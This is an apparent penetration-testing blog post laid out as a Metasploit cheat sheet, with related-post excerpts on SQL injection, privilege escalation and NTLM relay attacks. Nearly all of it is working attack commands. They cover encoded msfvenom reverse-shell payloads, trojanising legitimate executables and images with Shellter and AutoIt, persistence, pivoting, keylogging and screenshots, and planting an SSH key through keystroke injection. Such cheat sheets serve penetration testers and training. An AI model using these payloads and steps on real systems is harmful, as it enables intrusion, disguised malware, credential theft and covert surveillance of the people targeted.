Skip to main content

Metasploit Commands Cheatsheet

By 

Basic Metasploit Commands 

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe

shellter --> shellter is a dynamic shellcode injection tool, it can be used in order to inject shellcode into
native windows applications

downlaod any program to bind our payload 
download and open shellter in windows
Select "A"
select "N"
drag the program to which our payload is to be binded

select "stealth mode" y
L
1
set attacker_ip
set port 8080
--------------------------------

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lport 8080

MAINTAINING PERSISTANT CONNECTION

#get into a meterpreter connection first

background
use exploit/windows/local/persistence
show options
set EXE_NAME service1
set DELAY 10
sessions -i           /show sessions
set session 3
show advanced
set EXE::CUSTOM /root/Desktop/malw.exe
show options 
run // payload successfully injected into target machine

sessions 3

meterpreter>
Process Migration 

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
set LPORT

run

meterpreter> ps               /lists all running processes
meterpreter > migrate ANY_PID
              migrate 255

Binding a Payload to a Legitimate Executablel to Meterperter

msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=443 -f exe -e -e x86/shikata_ga_nai -i 9 -x plink.exe -o payload_plink.exe

# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 

or

# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush 
Normal Shel

#list the sessions
sessions -i
use post/multi/manage/shell_to_meterpreter
set sessions 1 
run 

or 

sessions -i
#migrate from normal shell to meterpereter
sessions -u 1
#login in as meterpterter 2=the session number
sessions 2
Metasploit One Liner

msfconsole -x "use exploit/unix/smtp/qmail_bash_env_exec;set payload cmd/unix/reverse;set LPORT 8080;set RPORT 25;set RHOST 10.10.10.10;set mailto 'admin@testqmail2.test';run;"

Pivoting

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.14.14.6
run
background
sessions -i
use post/multi/manage/autoroute
set SUBNET 192.168.125.0
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVPORT 1060
run






use auxiliary/server/socks5 
set SRVPORT 1090

#on Attacker Machine 
sudo nano /etc/proxychains.conf  
socks5 127.0.0.1 1090

Pivoting - Autoroute method

meterpreter> background 

# Add Route
run autoroute -s 192.168.125.0/24

#View Route
run autoroute -p

background 

use /auxilary/scanner/portscan/tcp
set RHOSTS 192.168.125.88
set THREADS 5
run

use /auxiliary/server/socks4
info
jobs -l

Setting up proxy on meterpreter

use post/windows/manage/portproxy 
set CONNECT_ADDRESS 10.10.10.12 
set CONNECT_PORT 80 
set LOCAL_ADDRESS 10.10.10.11
set LOCAL_PORT 80 
set session 1 
run
Setting up Relay Server 

use auxiliary/server/http_ntlmrelay 
set RHOST 10.10.10.11 
set RURIPATH /admin/admin.php
set URIPATH / 
set SRVHOST 10.10.10.12 
set SRVPORT 80 
run 
Passing session to Metasploit

msf5 exploit(multi/handler) > use exploit/multi/handler
msf5 exploit(multi/handler) > setg payload windows/x64/meterpreter/reverse_https
msf5 exploit(multi/handler) > setg lhost 10.10.10.12
msf5 exploit(multi/handler) > setg lport 8001
msf5 exploit(multi/handler) > setg exitfunc thread
msf5 exploit(multi/handler) > setg exitonsession false
msf5 exploit(multi/handler) > run -j


#generating a Stager
use payload/windows/x64/meterpreter/reverse_http
generate -f raw -u /tmp/shellcode.bin
xxd -ps /tmp/shellcode.bin | tr -d "\n"

#copy the shellcode and it can be run on the target machine, which returns a reverse shell to metasploit. this can be easily done via Covenant 
#Go to your Grunt --> Task --> ShellCode --> paste the Hex data and execut the task. you should see a reverses shell on metasploit  
BINDING A PAYLOAD TO A IMAGE

#downlaod and open autoit
#open the script that you have, replace the url with the acutal image url
#browser the script into the autoit
#set it to exe
tick --> x64
select a icon, download it and browse it -->
use this to convert a image to icon -->  https://image.online-convert.com/convert-to-ico

now bind it with a payload using shellter
create a payload

msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp

--> run the exploit on the target machine ..

 

=======================================  

Meterpreter Commands
======================================

#list the process
Meterpreter> ps

#Migrate the process to explorer for better connection
migrate PID

#start capturing keystrokes
keyscan_start

#dump keystrokes
keyscan_dump

#Send a keystroke
meterpreter > keyboard_send "cd /root/.ssh"

#Send "Enter" key
meterpreter > keyevent 13 press

#Send a keystroke
meterpreter > keyboard_send "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDde44691/2bS5G+W9uUQ9tgJw0BJHkwUxLr5woKeh5JbYBOcrygf1rZbFBxsRcEExK0x2kSOU4DRmpcctQ+qq5ZqeYXboAGLrZBQl9hmnovbbC/5grj+Vj+OnMHaREpBTL7VXODN80KQ1/eKvqPpzx7dQt38xXKg9T8E4+X3BYEf6samL/R97do//yLAXwoDz8jRzeip23qUJrS1eBH7Bb/l+qsLBtnCv09eUDGB7JTm+m5DlnCrZRfzXmAUimH2TFgTARHOJxlrD97+uywfax6LTjCMT7p5PI7sX6F9r4gzFBHzojmuJmUXe22LcVkZvUKMdhDSYssh7XRfLrESXWsSGbgwXql+jgOcxbpc8qwakLY8x1ZkyswJOn4hFyYGojNR0fA/gY6093IDUJ3xwBQCn3Eb3jEosR54YRMeq8IJzAChy28RyV7GiqceK408Qihk3/ECHrmWI8mZ1BxJJuaq6xfP9diiARjplX6bYMZN7C2zGRAHWe7NvgONve+Ts= Bhanu@HackingDream > authorized_keys"
[*] Done

#Send "Enter" key
meterpreter > keyevent 13 press

#Take Screenshot
meterpreter > screenshot
Screenshot saved to: /home/Bhanu//FabUVLRz.jpeg







Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more